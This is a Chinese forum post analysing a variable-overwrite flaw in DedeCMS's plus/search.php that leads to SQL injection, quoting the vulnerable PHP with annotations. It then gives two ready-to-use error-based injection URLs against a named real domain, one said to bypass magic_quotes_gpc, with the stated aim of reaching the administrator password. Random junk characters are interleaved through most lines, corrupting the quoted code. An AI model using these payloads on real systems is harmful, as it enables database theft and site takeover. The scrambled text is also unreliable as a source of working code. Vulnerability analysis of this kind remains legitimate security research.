微博上看到就分析了一下,这个漏洞不止一处地方可以被利用.其实可以无视magic_quotes_gpc = On的时候.真心不鸡肋.
) K8 ~" B8 U# y" s作者: c4rp3nt3r@0x50sec.org& J: o2 b5 \) ^4 P( F% u
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
, ?" @) ^5 F! w2 J, ] * q, \3 z- n7 N) S
黑哥说漏洞已补.怪我没有测试好.也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
0 e. x9 I% B2 U9 f" j7 I* N+ A% I
% Y+ l" `: w% M/ G============
6 f- r' v( a6 u8 ? k
: V2 E* J: `0 P8 F! q
4 ]: h+ a0 x4 n: h! ^: f; Z" r; HDedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.# I; A8 X& U# a& v( p( B- U2 ?0 H
' W- F) w: w- `, vrequire_once(dirname(__FILE__).”/../include/common.inc.php”);
& ^ N1 p( A) A* x [require_once(DEDEINC.”/arc.searchview.class.php”);% n* Y; p' s# ]* a; e
, m7 _5 R7 ?+ V3 t$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;
. m" A2 I3 {: M$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;2 I6 p- T2 }; v h* Z6 v' d
$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
$ |' K4 F J) X- F0 L' O- Z0 T& W. g$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;' b ~8 Z0 @: w
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0; c2 P$ p. Z7 y- x! s v% a' A( B
$ u# J5 i2 a9 B9 gif(!isset($orderby)) $orderby=”;0 H9 g, m8 S+ D) s2 @! P
else $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);
9 K7 K2 b1 h/ d5 P9 m
( B& M1 `) d' F
- n2 U& ]9 N! x, d% T$ ]if(!isset($searchtype)) $searchtype = ‘titlekeyword’;# d% g: n$ W( {( P& s% f0 G8 _
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
3 i- R2 p5 i% A$ @9 l8 B- N
6 Q( ^3 A5 G+ T4 m" @, \) Fif(!isset($keyword)){
4 Z. b- z; i+ w, R- ^ if(!isset($q)) $q = ”;
: ]& `$ E h( }) S$ q# W7 Z $keyword=$q;( B% K# T0 D+ \/ {
}. ~0 j( f9 n6 q$ j; I( ?
" F# }; e# l4 C' ~$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));
& j9 n/ c# a9 ?: y2 |" H! a ) N5 H8 `* m& T N# S
//查找栏目信息
3 i/ t- N8 a3 u+ q8 eif(empty($typeid))
X- D+ z7 {- A+ W* x$ [8 S4 z" D{
; x! p) e% c# P) ^" J8 h $typenameCacheFile = DEDEDATA.’/cache/typename.inc’;" s% q5 }0 [. k5 c6 P! Y4 T
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) ), K: L9 c5 a9 G0 @4 V! I# T
{
5 t% X8 d$ A0 F R3 ?" ~ $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
0 W' m+ M7 f) U0 x fwrite($fp, “<”.”?php\r\n”);
0 D' T: g7 O b% f $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);, _& ?% e' H+ b( u( w/ Z- y
$dsql->Execute();) x( q8 H5 I9 b' B3 W
while($row = $dsql->GetArray())9 u C/ S8 Y9 T! e
{
4 L+ a; t; m7 W O) g" H fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);) N T. h" B h" _7 }( C
}, U+ @' A& n* O8 W) O
fwrite($fp, ‘?’.'>’);/ y0 P. q2 P4 N$ ^
fclose($fp);
0 @9 J- n! R( F } @! c, @% x" ~! P
//引入栏目缓存并看关键字是否有相关栏目内容
7 X& F/ E( }& @% F; M2 Y: u$ P- A require_once($typenameCacheFile);
# c5 P" K; w) A) O//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个- @# _0 ]3 Z: u6 l/ N( [" n
//8 x/ K7 ^. ? F2 [5 {9 f# {
if(isset($typeArr) && is_array($typeArr))0 q) |* Q R, u" t* b8 i
{
# t6 H' o# E" L$ J9 g foreach($typeArr as $id=>$typename)
) Z7 s; v, i1 [1 D {7 T4 K, A! b) Y- f# B
. j& o2 \" K8 c( C2 H
<font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过4 }. m! B% t+ `* M
if($keyword != $keywordn)8 @4 c A/ y7 F9 | w
{0 r' I5 ~0 F6 \6 `, ?. x
$keyword = $keywordn;1 j \$ R6 Z1 n; g; l7 b5 h- D! X' W7 S
<font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
" ?" r: [4 Z, @3 D break;
* Y" C( Q* ` @/ K }
3 m7 M+ r* F; c8 g }
4 { E9 y8 l+ t2 S5 W; G5 w }2 C: \# o! N, o* Z4 |
}7 \+ \& v* Z) [( y. K) m
然后plus/search.php文件下面定义了一个 Search类的对象 .* h; `$ \( _% A% x$ X
在arc.searchview.class.php 文件的SearchView类的构造函数 声明了一个TypeLink类.0 l* Y0 t6 s# R0 l* T
$this->TypeLink = new TypeLink($typeid);
. L. P# e( ^% \5 O5 c9 p9 I; Q
; z2 s' K+ Y6 q2 f' B& n& V! vTypeLink类的构造函数没有经过过滤,(程序员以为前面已经过滤过了… )直接带入了sql语句.2 A. ]! H+ s, [- ]- M( ^
C2 v) e) d7 Y% R; h
class TypeLink
( o5 y/ v3 K) @6 F) e! @5 b) C7 }{- |# A3 n# Z2 V' v
var $typeDir;
4 T* F: N& \+ V7 _$ s9 X7 i; J var $dsql;1 i9 u3 B$ O8 w" v' ?; A
var $TypeID;; J/ Q v$ d5 z/ \9 O& J$ m
var $baseDir;
6 S, q& i" X. `( A) u) E+ S u var $modDir;
+ S& M8 m& ?0 |# b0 r* ?3 q7 e var $indexUrl;2 R% ? [* b4 X- d3 I, A1 ~* K2 b& N# x
var $indexName;9 D6 P5 g3 K) U& Q. ^
var $TypeInfos;
- K+ Z% O% x5 c9 x$ g var $SplitSymbol;
/ W# d; y; k5 d2 g+ m3 v4 X var $valuePosition;0 H; M4 `; S$ u: c) m6 M
var $valuePositionName;
1 ^4 Z/ s' J* H8 w; l# Q& d var $OptionArrayList;//构造函数///////
5 H6 x3 `' g9 _# m //php5构造函数" M& ^2 a4 }/ r
function __construct($typeid)& `( @+ M! K3 g3 L: u' P, Z) w+ M
{
, J, Z$ ]) j. p1 v $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl']; y: k0 Y) f2 u7 I& J* M2 u
$this->indexName = $GLOBALS['cfg_indexname'];% ?4 k7 ?0 L9 Q; y3 \# O) r
$this->baseDir = $GLOBALS['cfg_basedir'];) U: ]' p8 y3 }7 g: U
$this->modDir = $GLOBALS['cfg_templets_dir'];" ?2 `; p0 C- ^! x
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];9 u8 E4 u5 r4 l1 E
$this->dsql = $GLOBALS['dsql'];/ U( z" N0 L" {! o+ Z3 ]+ S) f
$this->TypeID = $typeid;8 N. H3 {- Q0 o$ P5 F. d. w! F
$this->valuePosition = ”;
, X8 X+ Q6 _7 Q1 a i3 s$ @3 D& H $this->valuePositionName = ”;. J5 `9 P1 `% Z$ ]8 ~
$this->typeDir = ”;
- E& ]7 H9 U- i. K& n $this->OptionArrayList = ”;
- y( E* F1 n0 j2 n, R+ H
7 z0 X G) z8 C9 f$ e# Q //载入类目信息
6 \, J+ Y$ f2 T8 ^* M. J 3 X d+ K( R8 R
<font color=”Red”>$query = “SELECT tp.*,ch.typename as2 _) J% R- H( Q( ^, D# k+ [0 L
ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
# w9 B0 L" O. {1 \, B s% t`#@__channeltype` ch8 f+ Q- `' R+ f( u
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿- M% P6 j, ]9 J0 z
8 ^" v* a% W( ^' n if($typeid > 0)
) X2 d) M( p5 E1 R. j {
9 d O4 N+ N1 x9 s $this->TypeInfos = $this->dsql->GetOne($query);
7 A# X: W- Y: Y& W利用代码一 需要 即使magic_quotes_gpc = Off
9 i& h) r y1 Q0 @ ( J% T6 z& g6 d9 b! K i
www.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title
/ M, N6 s5 m8 Z) e6 [5 a
7 K# ~9 o5 Z+ a: g6 F2 k6 p这只是其中一个利用代码… Search 类的构造函数再往下0 h/ X$ g( z8 z; T2 A; S& t6 M0 F
" M2 ?5 f# F5 n/ W
……省略( n3 a. L$ @* G, s
$this->TypeID = $typeid;
0 h: I. D8 r N5 n9 a, X……省略
0 ~0 S9 Y# @8 N1 R5 F0 e; Bif($this->TypeID==”0″){5 I8 S) ?; O8 v9 U4 _
$this->ChannelTypeid=1;, }8 |2 d* _9 |4 S3 J _
}else{
& o, r& z: n9 A' o, `- P $row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
. z" @0 f3 w* [. B3 P# \//现在不鸡肋了吧亲…
1 n$ S9 k8 ^& e: C1 a- g" Q4 L $this->ChannelTypeid=$row['channeltype'];
2 M" f% H) `' c8 S: B! T
8 y& F+ a! P$ W3 Y( j' P }
% P4 D8 D( O% V* W% }+ u利用代码二,下面这个EXP 即使magic_quotes_gpc = On 也可以成功利用.% t+ [" Q% `# N- a0 T4 X
) Y3 @# J- |" D: \
www.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
8 J: K+ F" L& m7 s0 ?5 V+ }& S0 k% c2 @ ! @( H% ]5 L; f+ R5 }
如果那个数据库里存在内容,就要考虑的复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站6 m* [ g9 ?$ O* W" k
|
发表于 2013-1-19 08:18:56
收藏
支持
反对